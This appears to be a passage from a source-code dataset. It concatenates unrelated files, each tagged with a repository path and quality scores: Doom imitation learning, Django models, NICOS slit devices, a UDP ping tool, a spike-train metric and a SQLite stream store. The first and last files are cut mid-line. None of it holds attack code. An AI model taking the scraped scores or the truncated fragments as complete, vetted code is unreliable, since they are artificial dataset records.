length.data) all_text = [v.strip().split('$')[0] for v in sim_preds] print(sim_preds) print("time3: ",time.time()-tik) result_img = utils.saveResult(args.img_path, image_raw[:,:,::-1], bboxes,save_file=False, texts=all_text) print("time4: ",time.time()-tik) print(all_text) cv2.imshow('Capture', result_img) if cv2.waitKey(1) & 0xFF == ord('q'): break
2.21875
2
src/imitation_frames.py
akolishchak/doom-net-pytorch
143
12747435
# # imitation_frames.py, doom-net # # Created by <NAME> on 01/21/17. # import os import time import h5py import torch import torch.nn as nn import torch.optim as optim from device import device import argparse from doom_instance import * from aac import BaseModel def data_generator(args, screens, variables, labels, episodes, step_size): # remove short episodes episode_min_size = args.episode_size*step_size episodes = episodes[episodes[:, 1]-episodes[:, 0] > episode_min_size] episodes_num = len(episodes) # step_idx = episodes[:, 0].copy() + np.random.randint(step_size, size=episodes_num) step_screens = np.ndarray(shape=(args.batch_size, *screens.shape[1:]), dtype=np.float32) step_variables = np.ndarray(shape=(args.batch_size, *variables.shape[1:]), dtype=np.float32) step_labels = np.ndarray(shape=(args.batch_size,), dtype=np.int) step_terminals = np.ones(shape=(args.batch_size,), dtype=np.float32) # select episodes for the initial batch batch_episodes = np.random.randint(episodes_num, size=args.batch_size) while True: for i in range(args.batch_size): idx = batch_episodes[i] step_screens[i, :] = screens[step_idx[idx]] / 127.5 - 1.0 step_variables[i, :] = variables[step_idx[idx]] / 100 step_labels[i] = labels[step_idx[idx]] step_idx[idx] += step_size if step_idx[idx] > episodes[idx][1]: step_idx[idx] = episodes[idx][0] + np.random.randint(step_size) step_terminals[i] = 0 # reached terminal state, select a new episode batch_episodes[i] = np.random.randint(episodes_num) else: step_terminals[i] = 1 yield torch.from_numpy(step_screens), \ torch.from_numpy(step_variables), \ torch.from_numpy(step_labels), \ torch.from_numpy(step_terminals) def train(args): data_file = h5py.File(args.h5_path, 'r') screens = data_file['screens'] variables = data_file['variables'] labels = data_file['action_labels'] print('Dataset size =', len(screens)) action_sets = data_file['action_sets'][:] episodes = data_file['episodes'][:] input_shape = screens[0].shape train_generator = data_generator(args, screens, variables, labels, episodes, args.skiprate) np.save('action_set', action_sets) model = BaseModel(input_shape[0]*args.frame_num, len(action_sets), variables.shape[1], args.frame_num).to(device) if args.load is not None and os.path.isfile(args.load): print("loading model parameters {}".format(args.load)) source_model = torch.load(args.load) model.load_state_dict(source_model.state_dict()) del source_model criterion = nn.CrossEntropyLoss() optimizer = optim.AdamW(model.parameters(), lr=5e-4) optimizer.zero_grad() running_loss = 0 running_accuracy = 0 batch_time = time.time() for batch, (screens, variables, labels, terminals) in enumerate(train_generator): labels = labels.to(device) outputs, _ = model(*model.transform_input(screens, variables)) loss = criterion(outputs, labels) model.set_terminal(terminals) running_loss += loss.item() _, pred = outputs.max(1) accuracy = (pred == labels).float().mean() running_accuracy += accuracy loss.backward() optimizer.step() optimizer.zero_grad() if batch % args.episode_length == args.episode_length - 1: running_loss /= args.episode_length running_accuracy /= args.episode_length print( '[{:d}] loss: {:.3f}, accuracy: {:.3f}, time: {:.6f}'.format( batch + 1, running_loss, running_accuracy, time.time()-batch_time ) ) running_loss = 0 running_accuracy = 0 batch_time = time.time() if batch % args.checkpoint_rate == args.checkpoint_rate - 1: torch.save(model, args.checkpoint_file) if __name__ == '__main__': parser = argparse.ArgumentParser(description='Doom Recorder') 
parser.add_argument('--episode_size', type=int, default=20, help='number of steps in an episode') parser.add_argument('--batch_size', type=int, default=64, help='number of game instances running in parallel') parser.add_argument('--load', default=None, help='path to model file') parser.add_argument('--h5_path', default=os.path.expanduser('~') + '/test/datasets/vizdoom/cig_map01/flat.h5', help='hd5 file path') parser.add_argument('--skiprate', type=int, default=2, help='number of skipped frames') parser.add_argument('--episode_length', type=int, default=30, help='episode length') parser.add_argument('--frame_num', type=int, default=4, help='number of frames per input') parser.add_argument('--checkpoint_file', default=None, help='check point file name') parser.add_argument('--checkpoint_rate', type=int, default=5000, help='number of batches per checkpoit') args = parser.parse_args() train(args)
2.21875
2
examples/prompts/auto-completion/multi-column-autocompletion-with-meta.py
scalabli/quo
3
12747563
#!/usr/bin/env python
"""
Autocompletion example that shows meta-information alongside the completions.
"""
from quo.completion import WordCompleter
from quo.prompt import Prompt

animal_completer = WordCompleter(
    [
        "alligator",
        "ant",
        "ape",
        "bat",
        "bear",
        "beaver",
        "bee",
        "bison",
        "butterfly",
        "cat",
        "chicken",
        "crocodile",
        "dinosaur",
        "dog",
        "dolphin",
        "dove",
        "duck",
        "eagle",
        "elephant",
    ],
    meta_dict={
        "alligator": "An alligator is a crocodilian in the genus Alligator of the family Alligatoridae.",
        "ant": "Ants are eusocial insects of the family Formicidae",
        "ape": "Apes (Hominoidea) are a branch of Old World tailless anthropoid catarrhine primates ",
        "bat": "Bats are mammals of the order Chiroptera",
    },
)

session = Prompt(
    completer=animal_completer, complete_style="multi_column"
)


def main():
    text = session.prompt("Give some animals: ")
    print("You said: %s" % text)


if __name__ == "__main__":
    main()
2.40625
2
Binary Search/leetcode744. Find Smallest Letter Greater Than Target.py
aurora314156/leetcode
0
12747691
class Solution:
    def nextGreatestLetter(self, letters: List[str], target: str) -> str:
        if target >= letters[-1]:
            return letters[0]
        left, right = 0, len(letters)
        while left < right:
            mid = left + (right - left) // 2
            if letters[mid] <= target:
                left = mid + 1
            else:
                right = mid
        return letters[left]
2.296875
2
addresses/models.py
CzechInvest/ciis
1
12747819
<filename>addresses/models.py<gh_stars>1-10
from django.db import models
from django.contrib.gis.db import models as gis_models
import json

# Create your models here.


class Address(models.Model):
    adm = models.IntegerField(
        help_text='Kód ADM',
        primary_key=True)

    street = models.CharField(
        max_length=200,
        help_text="Ulice")

    house_number = models.CharField(
        max_length=20,
        default=None,
        null=True,
        help_text="Domovní číslo")

    orientation_number = models.CharField(
        max_length=20,
        default=None,
        null=True,
        help_text="Orientační číslo")

    city = models.ForeignKey("City", on_delete=models.CASCADE)

    zipcode = models.CharField(
        max_length=200,
        help_text="PSČ")

    coordinates = gis_models.PointField(
        null=True)

    @property
    def number(self):
        slash = ""
        if self.orientation_number:
            slash = "/"
        return "{}{}{}".format(
            self.house_number,
            slash,
            self.orientation_number
        )

    def __str__(self):
        if self.street:
            street = self.street
        else:
            street = self.city
        return "{}, {}, {} - {}".format(street, self.number, self.zipcode, self.city)

    @property
    def json(self):
        return {
            "adm": self.adm,
            "street": self.street,
            "house_number": self.house_number,
            "orientation_number": self.orientation_number,
            "city": self.city.name,
            "zipcode": self.zipcode,
            "coordinates": json.loads(self.coordinates.json)
        }


class City(models.Model):
    code = models.IntegerField(
        unique=True,
        primary_key=True)

    name = models.CharField(
        max_length=200,
        help_text="Obec")

    def __str__(self):
        return self.name
1.710938
2
songs/migrations/0004_auto_20200212_1404.py
cr0manty/Fox_Project
0
12747947
# Generated by Django 2.2.7 on 2020-02-12 12:04

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('songs', '0003_auto_20200107_0103'),
    ]

    operations = [
        migrations.AlterField(
            model_name='song',
            name='artist',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AlterField(
            model_name='song',
            name='name',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AlterField(
            model_name='song',
            name='song_id',
            field=models.IntegerField(unique=True),
        ),
    ]
0.832031
1
nicos_sinq/amor/devices/slit.py
ebadkamil/nicos
12
12748075
# -*- coding: utf-8 -*- # ***************************************************************************** # NICOS, the Networked Instrument Control System of the MLZ # Copyright (c) 2009-2021 by the NICOS contributors (see AUTHORS) # # This program is free software; you can redistribute it and/or modify it under # the terms of the GNU General Public License as published by the Free Software # Foundation; either version 2 of the License, or (at your option) any later # version. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more # details. # # You should have received a copy of the GNU General Public License along with # this program; if not, write to the Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA # # Module authors: # <NAME> <<EMAIL>> # <NAME> <<EMAIL>> # # ***************************************************************************** """Slit devices in AMOR""" from numpy import arctan, radians, tan from nicos.core import Attach, HasPrecision, Override, Param, Readable, \ dictwith, oneof, status from nicos.core.utils import multiStatus from nicos.devices.generic.slit import Slit, SlitAxis from nicos_sinq.amor.devices.logical_motor import AmorLogicalMotor, \ InterfaceLogicalMotorHandler class SlitOpening(HasPrecision, SlitAxis): """Device to control the slit opening/height. Motor dXt changes moves the slit's top slab in turn changing the slit opening. Motor dXb changes the position of the whole slit moving it up or down (X is the slit number). This device reads the current opening using the motor dXt and changes the opening using combination of the motors dXt and dXb such that the center remains aligned. """ parameter_overrides = { 'unit': Override(mandatory=False, default='mm'), 'fmtstr': Override(userparam=False), 'maxage': Override(userparam=False), 'pollinterval': Override(userparam=False), 'warnlimits': Override(userparam=False), 'precision': Override(userparam=False, default=0.01), 'target': Override(volatile=True) } status_to_msg = { status.ERROR: 'Error in %s', status.BUSY: 'Moving: %s ...', status.WARN: 'Warning in %s', status.NOTREACHED: '%s did not reach target!', status.UNKNOWN: 'Unknown status in %s!', status.OK: 'Ready.' 
} def doReadTarget(self): # Do not allow None as target target = self._getFromCache('target', self.doRead) return target if target is not None else self.doRead(0) def _convertRead(self, positions): return positions[3] def _convertStart(self, target, current): current_opening = current[3] current_bottom = current[2] new_bottom = current_bottom + 0.5 * (current_opening - target) return current[0], current[1], new_bottom, target def doStatus(self, maxage=0): # Check for error and warning in the dependent devices st_devs = multiStatus(self._adevs, maxage) devs = [dname for dname, d in self._adevs.items() if d.status()[0] == st_devs[0]] if st_devs[0] in self.status_to_msg: msg = self.status_to_msg[st_devs[0]] if '%' in msg: msg = msg % ', '.join(devs) return st_devs[0], msg return st_devs def read_divergence(xs, slit): left, _, bottom, top = slit s = arctan(top/xs) d = arctan(bottom/xs) return s+d, 2*arctan(left/xs), (s-d)/2 def read_beam_shaping(slit): left, right, bottom, top = slit return top+bottom, right+left, (top-bottom)/2 class AmorSlitHandler(InterfaceLogicalMotorHandler): attached_devices = { 'xs': Attach('Sample x position', Readable, missingok=True, optional=True), 'mu': Attach('Sample omega', Readable, missingok=True, optional=True), 'nu': Attach('Sample omega', Readable, missingok=True, optional=True), 'ltz': Attach('Sample x position', Readable, missingok=True, optional=True), 'xd2': Attach('Sample x position', Readable, missingok=True, optional=True), 'xl': Attach('Deflector x position', Readable, missingok=True, optional=True), 'mu_offset': Attach('Sample x position', Readable, missingok=True, optional=True), 'kappa': Attach('Inclination of the beam after the Selene guide', Readable, missingok=True, optional=True), 'soz_ideal': Attach('Ideal sample omega', Readable, missingok=True, optional=True), 'xd3': Attach('', Readable, missingok=True, optional=True), 'slit1': Attach('slit 1', Slit, missingok=True, optional=True), 'slit2': Attach('slit 2', Slit, missingok=True, optional=True), 'slit2z': Attach('Z motor for slit 2', Readable, missingok=True, optional=True), 'slit3': Attach('slit 3', Slit, missingok=True, optional=True), 'slit3z': Attach('Z motor for slit 3', Readable, missingok=True, optional=True), } def doPreinit(self, mode): self._status_devs = ['slit1', 'slit2', 'slit2z', 'slit3', 'slit3z'] InterfaceLogicalMotorHandler.doPreinit(self, mode) self.valuetype = dictwith(div=float, did=float, dih=float) def doRead(self, maxage=0): result = {} if self._is_active('diaphragm1'): v, h, d = read_divergence(self._read_dev('xs'), self._read_dev('slit1')) result.update({'div': v, 'dih': h, 'did': d}) if self._is_active('diaphragm2'): v, h, d = read_beam_shaping(self._read_dev('slit2')) result.update({'d2v': v, 'd2h': h, 'd2d': d}) if self._is_active('diaphragm3'): v, h, d = read_beam_shaping(self._read_dev('slit3')) result.update({'d3v': v, 'd3h': h, 'd3d': d}) return result def _get_move_list(self, targets): positions = [] if self._is_active('diaphragm1'): xs = self._read_dev('xs') div = targets.get('div') or self._read_dev('div') did = targets.get('did') or self._read_dev('did') dih = targets.get('dih') or self._read_dev('dih') top = xs * tan(radians(div / 2 + did)) bottom = xs * tan(radians(div / 2 - did)) horizontal = xs * tan(radians(dih / 2)) positions.extend([(self._get_dev('slit1'), (top, bottom, horizontal, horizontal)) ]) if self._is_active('diaphragm2'): v = targets.get('d2v') d = targets.get('d2d') h = targets.get('d2h') ltz = self._read_dev('ltz') xd2 = 
self._read_dev('xd2') xl = self._read_dev('xl') mu_offset = self._read_dev('mu_offset') kappa = self._read_dev('kappa') if self._is_active('deflector'): z = ltz - (xd2 - xl) * tan(radians(self._read_dev('mu') + mu_offset)) else: z = xd2 * tan(radians(kappa)) top = 0.5 * (v + d) bottom = 0.5 * (v - d) horizontal = 0.5 * h positions.extend([(self._get_dev('slit2z'), z), (self._get_dev('slit2'), (top, bottom, horizontal, horizontal)) ]) if self._is_active('diaphragm3'): soz_ideal = self._read_dev('soz_ideal') xd3 = self._read_dev('xd3') nu = self._read_dev('nu') xs = self._read_dev('xs') kappa = self._read_dev('kappa') v = targets.get('d3v') d = targets.get('d3d') h = targets.get('d3h') z = soz_ideal + (xd3 - xs) * tan(radians(nu + kappa)) top = 0.5 * (v + d) bottom = 0.5 * (v - d) horizontal = 0.5 * h positions.extend([(self._get_dev('slit2z'), z), (self._get_dev('slit2'), (top, bottom, horizontal, horizontal)) ]) return positions motortypes = ['div', 'dih', 'did', 'd2v', 'd2h', 'd2d', 'd3v', 'd3h', 'd3d'] class AmorSlitLogicalMotor(AmorLogicalMotor): """ Class to represent the logical slit motors in AMOR. """ parameters = { 'motortype': Param('Type of motor %s' % ','.join(motortypes), type=oneof(*motortypes), mandatory=True), } parameter_overrides = { 'unit': Override(mandatory=False, default='degree'), 'target': Override(volatile=True), 'abslimits': Override(mandatory=False, default=(-3.0, 3.0)), 'userlimits': Override(mandatory=False, default=(-3.0, 3.0)) } attached_devices = { 'controller': Attach('Controller for the logical motors', AmorSlitHandler) } def doRead(self, maxage=0): return self._attached_controller.doRead(maxage)
1.390625
1
Codes/Python32/Lib/distutils/tests/test_filelist.py
eyantra/FireBird_Swiss_Knife
4
12748203
"""Tests for distutils.filelist.""" import unittest from distutils.filelist import glob_to_re, FileList from test.support import captured_stdout, run_unittest from distutils import debug class FileListTestCase(unittest.TestCase): def test_glob_to_re(self): # simple cases self.assertEqual(glob_to_re('foo*'), 'foo[^/]*\\Z(?ms)') self.assertEqual(glob_to_re('foo?'), 'foo[^/]\\Z(?ms)') self.assertEqual(glob_to_re('foo??'), 'foo[^/][^/]\\Z(?ms)') # special cases self.assertEqual(glob_to_re(r'foo\\*'), r'foo\\\\[^/]*\Z(?ms)') self.assertEqual(glob_to_re(r'foo\\\*'), r'foo\\\\\\[^/]*\Z(?ms)') self.assertEqual(glob_to_re('foo????'), r'foo[^/][^/][^/][^/]\Z(?ms)') self.assertEqual(glob_to_re(r'foo\\??'), r'foo\\\\[^/][^/]\Z(?ms)') def test_debug_print(self): file_list = FileList() with captured_stdout() as stdout: file_list.debug_print('xxx') stdout.seek(0) self.assertEqual(stdout.read(), '') debug.DEBUG = True try: with captured_stdout() as stdout: file_list.debug_print('xxx') stdout.seek(0) self.assertEqual(stdout.read(), 'xxx\n') finally: debug.DEBUG = False def test_suite(): return unittest.makeSuite(FileListTestCase) if __name__ == "__main__": run_unittest(test_suite())
1.882813
2
utilities/exclude/open3d_utilities.py
bootml/agent
0
12748331
<reponame>bootml/agent
import numpy as np
import open3d

if __name__ == "__main__":
    print("Load a ply point cloud, print it, and render it")
    pcd = open3d.read_point_cloud('/home/heider/Datasets/pointclouds/office.ply')
    print(pcd)
    print(np.asarray(pcd.points))
    # open3d.draw_geometries([pcd])

    print("Downsample the point cloud with a voxel of 0.05")
    downsampled = open3d.voxel_down_sample(pcd, voxel_size=0.1)
    # open3d.draw_geometries([downpcd])

    print("Recompute the normal of the downsampled point cloud")
    open3d.estimate_normals(downsampled,
                            search_param=open3d.KDTreeSearchParamHybrid(
                                radius=0.1, max_nn=30))
    open3d.draw_geometries([downsampled])
1.585938
2
api/resources_portal/models/associations/grant_material_association.py
AlexsLemonade/resources-portal
0
12748459
<reponame>AlexsLemonade/resources-portal
from django.db import models

from resources_portal.models.grant import Grant
from resources_portal.models.material import Material


class GrantMaterialAssociation(models.Model):
    grant = models.ForeignKey(Grant, blank=False, null=False, on_delete=models.CASCADE)
    material = models.ForeignKey(Material, blank=False, null=False, on_delete=models.CASCADE)

    created_at = models.DateTimeField(auto_now_add=True)

    class Meta:
        db_table = "grant_material_associations"
        unique_together = ("grant", "material")
1.117188
1
furion/ping.py
keli/furion
32
12748587
import math
import time
import logging
import socket
import select

try:
    import socketserver
except ImportError:
    import SocketServer as socketserver


def ping(addr, count=20, timeout=1):
    """UDP ping client"""
    # print "--- PING %s:%d ---" % addr
    results = []
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    for i in range(count):
        ts = time.time()
        data = 'PING %d %f %s' % (i, ts, '#' * 480)
        data = data.encode('utf-8')
        sock.sendto(data, addr)
        readables, writeables, exceptions = select.select(
            [sock], [], [], timeout)
        # exception
        if exceptions:
            time.sleep(1)
            continue
        # timeout
        if (readables, writeables, exceptions) == ([], [], []):
            continue
        if readables:
            ret = readables[0].recv(512)
            if ret == data:
                time_spent = (time.time() - ts) * 1000
                results.append(time_spent)
                # print '%d bytes from %s:%d, seq=%d time=%.3f ms' % (len(data), addr[0], addr[1], i, time_spent)

    received = len(results)
    missing = count - received
    loss = count - received
    # print "--- %s:%d ping statistics---" % addr
    # print "%d packets transmitted, %d packets received, %.1f%% packet loss" % (count, received, float(loss)*100/count)
    logging.debug("ping %s result: %d transmitted, %d received, %.1f%% loss",
                  addr, count, received, float(loss) * 100 // count)

    if received != 0:
        min_val = min(results)
        max_val = max(results)
        avg = sum(results) // count
        stddev = math.sqrt(sum([(x - avg) ** 2 for x in results]) // received)
        # print "round-trip min/avg/max/stddev = %.3f/%.3f/%.3f/%.3f" % (min_val, avg, max_val, stddev)
        logging.debug("ping %s min/avg/max/stddev = %.3f/%.3f/%.3f/%.3f",
                      addr, min_val, avg, max_val, stddev)
        return missing * 500 + avg
    else:
        return float("inf")


class PingHandler(socketserver.BaseRequestHandler):
    """UDP Ping server handler"""

    def handle(self):
        data = self.request[0].strip()
        sock = self.request[1]
        sock.sendto(data, self.client_address)
        # print data


# Test client
# import threading
# for x in range(10):
#     threading.Thread(target = ping, args = (('172.16.31.10', 8888),)).start()
2.015625
2
src/SpikeTrainComparator.py
apayeur/GIF-K
1
12748715
<reponame>apayeur/GIF-K<filename>src/SpikeTrainComparator.py
import matplotlib.pyplot as plt
import numpy as np

from scipy.signal import fftconvolve


class SpikeTrainComparator :

    """
    This class contains experimental and predicted spike trains.
    Use this class to visualize and quantify the Md similarity metric between data and model prediction.

    To use the Kistler coincidence window K(s,s',D)=rect(s/D)*delta(s') call the function
    computeMD_Kistler(self, delta, dt)

    To use the double rectangular coincidence window K(s,s',D)=rect(s/D)*rect(s'/D) call the function
    computeMD_Rect(self, delta, dt)
    """

    def __init__(self, T, spks_data, spks_model):

        self.T = T                      # ms, duration of spike-trains
        self.spks_data = spks_data      # a small set of spike-trains (in ms)
        self.spks_model = spks_model    # a large set of spike-trains (in ms)

    def getAverageFiringRate(self):

        spks_cnt_data = 0
        for s in self.spks_data :
            spks_cnt_data += len(s)

        rate_data = float(spks_cnt_data)/(self.T/1000.0)/len(self.spks_data)

        spks_cnt_model = 0
        for s in self.spks_model :
            spks_cnt_model += len(s)

        rate_model = float(spks_cnt_model)/(self.T/1000.0)/len(self.spks_model)

        return (rate_data, rate_model)

    #########################################################################
    # MD KISTLER WINDOW
    #########################################################################
    def computeMD_Kistler(self, delta, dt) :

        print "Computing Md* - Kistler window (%0.1f ms precision)..." % (delta)

        KistlerDotProduct = SpikeTrainComparator.Md_dotProduct_Kistler
        KistlerDotProduct_args = {'delta' : delta }

        return self.computeMD(KistlerDotProduct, KistlerDotProduct_args, dt)

    @classmethod
    def Md_dotProduct_Kistler(cls, s1_train, s2_train, args, dt):

        delta = args['delta']

        rect_size_i = 2*int(float(delta)/dt)
        rect = np.ones(rect_size_i)

        s1_filtered = fftconvolve(s1_train, rect, mode='same')
        dotProduct = np.sum(s1_filtered*s2_train)

        return dotProduct

    #########################################################################
    # MD RECT*RECT WINDOW
    #########################################################################
    def computeMD_Rect(self, delta, dt) :

        print "Computing Md* - Rectangular window (%0.1f ms precision)..." % (delta)

        RectDotProduct = SpikeTrainComparator.Md_dotProduct_Rect
        RectDotProduct_args = {'delta' : delta }

        return self.computeMD(RectDotProduct, RectDotProduct_args, dt)

    @classmethod
    def Md_dotProduct_Rect(cls, s1_train, s2_train, args, dt=0.1):

        delta = args['delta']

        rect_size_i = 2*int(float(delta)/dt)
        rect = np.ones(rect_size_i)

        s1_filtered = fftconvolve(s1_train, rect, mode='same')
        s2_filtered = fftconvolve(s2_train, rect, mode='same')

        dotProduct = np.sum(s1_filtered*s2_filtered)

        return dotProduct

    def computeMD(self, dotProduct, dotProductArgs, dt) :

        T = self.T

        # Compute experimental spike trains (given spike times)
        all_spike_train_data = []
        all_spike_train_data_nb = len(self.spks_data)

        for s in self.spks_data :
            spike_train_tmp = SpikeTrainComparator.getSpikeTrain(s, T, dt)
            all_spike_train_data.append(spike_train_tmp)

        # Compute average spike-train for both sets
        spiketrain_data_avg = SpikeTrainComparator.getAverageSpikeTrain(self.spks_data, T, dt)
        spiketrain_model_avg = SpikeTrainComparator.getAverageSpikeTrain(self.spks_model, T, dt)

        # Compute dot product <data, model>
        #dotproduct_dm = SpikeTrainComparator.Md_dotProduct_Kistler(spiketrain_data_avg, spiketrain_model_avg, delta, dt)
        dotproduct_dm = dotProduct(spiketrain_data_avg, spiketrain_model_avg, dotProductArgs, dt=dt)

        # Compute dot product <model, model>
        #dotproduct_mm = SpikeTrainComparator.Md_dotProduct_Kistler(spiketrain_model_avg, spiketrain_model_avg, delta, dt)
        dotproduct_mm = dotProduct(spiketrain_model_avg, spiketrain_model_avg, dotProductArgs, dt=dt)

        # Compute dot product <data, data> using unbiased method
        tmp = 0
        for i in range(all_spike_train_data_nb) :
            for j in range(i+1, all_spike_train_data_nb) :
                tmp += dotProduct(all_spike_train_data[i], all_spike_train_data[j], dotProductArgs, dt=dt)

        dotproduct_dd_unbiased = tmp / (all_spike_train_data_nb*(all_spike_train_data_nb-1)/2.0)

        MDstar = 2.0*dotproduct_dm / (dotproduct_dd_unbiased + dotproduct_mm)

        print "Md* = %0.4f" % (MDstar)

        return MDstar

    @classmethod
    def getSpikeTrain(cls, s, T, dt):
        """
        Given spike times in s, build a spike train of duration T (in ms) and with a resolution of dt.
        """

        T_i = int(T/dt)

        s_i = np.array(s, dtype='double')
        s_i = s_i/dt
        s_i = np.array(s_i, dtype='int')

        spike_train = np.zeros(T_i)
        spike_train[s_i] = 1.0

        return np.array(spike_train)

    @classmethod
    def getAverageSpikeTrain(cls, all_s, T, dt):
        """
        Given a set of spike trains (each defined as a list of spike times), build the mean spike train
        vector of duration T (in ms) and with a resolution of dt.
        """

        T_i = int(T/dt)
        average_spike_train = np.zeros(T_i)
        nbSpikeTrains = len(all_s)

        for s in all_s :
            s_i = np.array(s, dtype='double')
            s_i = s_i/dt
            s_i = np.array(s_i, dtype='int')

            average_spike_train[s_i] += 1.0

        average_spike_train = average_spike_train / float(nbSpikeTrains)

        return np.array(average_spike_train)

    #######################################################################
    # FUNCTIONS FOR PLOTTING
    #######################################################################
    def plotRaster(self, fname, delta=10.0, dt=0.1):

        plt.figure(facecolor='white', figsize=(14,4))

        # Plot raster
        plt.subplot(2,1,1)

        nb_rep = min(len(self.spks_data), len(self.spks_model) )

        cnt = 0
        for spks in self.spks_data[:nb_rep] :
            cnt -= 1
            plt.plot(spks, cnt*np.ones(len(spks)), '|', color='black', ms=5, mew=2)

        for spks in self.spks_model[:nb_rep] :
            cnt -= 1
            plt.plot(spks, cnt*np.ones(len(spks)), '|', color='red', ms=5, mew=2)

        plt.ylabel('Neuron #')
        plt.ylim(cnt - 0.1, 0.1)
        plt.yticks([])

        # Plot PSTH
        plt.subplot(2,1,2)

        rect_width = delta
        rect_size_i = int(float(rect_width)/dt)
        rect_window = np.ones(rect_size_i)/(rect_width/1000.0)

        spks_avg_data = SpikeTrainComparator.getAverageSpikeTrain(self.spks_data, self.T, dt)
        spks_avg_data_support = np.arange(len(spks_avg_data))*dt
        spks_avg_data_smooth = fftconvolve(spks_avg_data, rect_window, mode='same')

        spks_avg_model = SpikeTrainComparator.getAverageSpikeTrain(self.spks_model, self.T, dt)
        spks_avg_model_support = np.arange(len(spks_avg_data))*dt
        spks_avg_model_smooth = fftconvolve(spks_avg_model, rect_window, mode='same')

        plt.plot(spks_avg_data_support, spks_avg_data_smooth, 'black', label='Data')
        plt.plot(spks_avg_model_support, spks_avg_model_smooth, 'red', label='Model')

        plt.legend()
        plt.xlabel("Time (ms)")
        plt.ylabel('PSTH (Hz)')

        plt.tight_layout()
        plt.savefig(fname, format='png')

        # Compute % of variance explained
        SSE = np.mean( (spks_avg_data_smooth-spks_avg_model_smooth)**2 )
        VAR = np.var(spks_avg_data_smooth)
        pct_variance_explained = (1.0 - SSE/VAR)*100.0

        print "Percentage of variance explained: %0.1f" % (pct_variance_explained)

        return float(pct_variance_explained)

        #plt.show()
2.421875
2
scripts/hbase-config-overrides.py
Lnk2past/magi-utils
0
12748843
#!/usr/bin/env python3
from os import environ

from common.helpers import read_xml, overwrite_file
from hdfs.helpers import process

if __name__ == '__main__':
    conf_dir = environ.get( "CONF_DIR" ) if environ.get( "CONF_DIR" ) else "/opt/hbase/conf"
    filename = "hbase-site.xml"
    print( f"using configuration: {conf_dir}/{filename}" )

    xml = read_xml( conf_dir, filename )
    processed_core_site = process( xml )

    if processed_core_site is not None:
        overwrite_file( conf_dir, filename, processed_core_site )
    else:
        print( f"using default {filename} from docker images" )

    print( "to learn more about the HDFS configs please visit the GitHub repo: https://github.com/magi-platform/magi" )
1.429688
1
examples/transmitter/swagger_server/db.py
duo-labs/sharedsignals
12
12748971
# Copyright (c) 2021 Cisco Systems, Inc. and its affiliates # All rights reserved. # Use of this source code is governed by a BSD 3-Clause License # that can be found in the LICENSE file. from typing import Any, Dict import contextlib import json import logging import os from pathlib import Path import sqlite3 from typing import Any, Dict, List, Optional, Union from swagger_server.events import SecurityEvent from swagger_server.encoder import JSONEncoder from swagger_server.errors import StreamDoesNotExist, SubjectNotInStream from swagger_server.models import Status CREATE_STREAMS_SQL = """ CREATE TABLE IF NOT EXISTS streams ( client_id TEXT PRIMARY KEY, stream_data TEXT ) """ CREATE_SUBJECTS_SQL = """ CREATE TABLE IF NOT EXISTS subjects ( client_id TEXT, email TEXT, status TEXT, FOREIGN KEY(client_id) REFERENCES streams(client_id), PRIMARY KEY(client_id, email) ) """ CREATE_SETS_SQL = """ CREATE TABLE IF NOT EXISTS SETs ( client_id TEXT NOT NULL, jti TEXT NOT NULL, timestamp INTEGER NOT NULL, event TEXT NOT NULL, FOREIGN KEY(client_id) REFERENCES streams(client_id), PRIMARY KEY(client_id, jti) ) """ @contextlib.contextmanager def connection() -> sqlite3.Connection: """Yield a connection that is guaranteed to close""" db_path = os.environ["DB_PATH"] conn = sqlite3.connect(db_path) conn.row_factory = sqlite3.Row try: yield conn finally: conn.close() def create(drop=False): if drop: logging.warning("Dropping database") db_path = Path(os.environ["DB_PATH"]) db_path.unlink(missing_ok=True) logging.info("Creating database") with connection() as conn: with conn: conn.execute(CREATE_STREAMS_SQL) conn.execute(CREATE_SUBJECTS_SQL) conn.execute(CREATE_SETS_SQL) def stream_exists(client_id: str) -> bool: """Get a client_id info based on a token""" with connection() as conn: row = conn.execute( "SELECT * FROM streams WHERE client_id=?", (client_id,) ).fetchone() return row is not None def save_stream(client_id: str, stream_data: str) -> None: """Saves a stream (minus subjects and events) to the db""" with connection() as conn: # open a transaction and commit if successful with conn: conn.execute( "REPLACE INTO streams VALUES (?, ?)", (client_id, stream_data) ) def load_stream(client_id: str) -> Dict[str, Any]: """Load the data needed to create a stream from the database""" with connection() as conn: row = conn.execute( "SELECT * FROM streams WHERE client_id=?", (client_id,) ).fetchone() if row: return json.loads(row["stream_data"]) else: raise StreamDoesNotExist() def get_stream_ids() -> List[str]: """Load the client id for all streams""" with connection() as conn: rows = conn.execute("SELECT client_id from streams").fetchall() return [row["client_id"] for row in rows] def add_subject(client_id: str, email: str) -> None: """Add a subject to a stream""" with connection() as conn: with conn: conn.execute( "INSERT INTO subjects VALUES (?, ?, ?)", (client_id, email, Status.enabled.value) ) def set_subject_status(client_id: str, email: str, status: Status) -> None: """Set a subject's status""" with connection() as conn: with conn: conn.execute(""" UPDATE subjects SET status = ? WHERE client_id = ? AND email = ? """, (status.value, client_id, email) ) if conn.total_changes != 1: raise SubjectNotInStream(email) def get_subject_status(client_id: str, email: str) -> Status: """Get a subject's status""" with connection() as conn: row = conn.execute( "SELECT * FROM subjects WHERE client_id=? 
